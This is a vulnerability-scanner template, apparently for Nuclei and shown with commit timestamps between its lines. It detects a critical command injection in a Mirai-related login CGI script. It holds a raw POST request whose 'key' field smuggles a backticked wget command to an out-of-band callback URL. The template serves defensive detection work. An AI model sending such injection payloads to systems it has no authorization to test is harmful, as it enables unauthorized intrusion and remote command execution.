2021-07-18 13:44:29 +00:00
id : mirai-unknown-rce
info :
2022-05-30 14:04:12 +00:00
name : Mirai - Remote Command Injection
2021-07-18 13:44:29 +00:00
author : gy741
severity : critical
2022-05-31 08:53:16 +00:00
description : |
Mirai is susceptible to an unknown exploit that targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-07-18 13:44:29 +00:00
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
2022-05-30 14:04:12 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-77
2021-10-18 20:40:26 +00:00
tags : mirai,rce,oast
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-18 13:44:29 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-18 13:44:29 +00:00
- raw :
- |
POST /cgi-bin/login.cgi HTTP/1.1
2021-09-30 16:52:05 +00:00
Host : {{Hostname}}
2021-07-18 13:44:29 +00:00
Content-Type : application/x-www-form-urlencoded
key=';`wget http://{{interactsh-url}}`;#
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"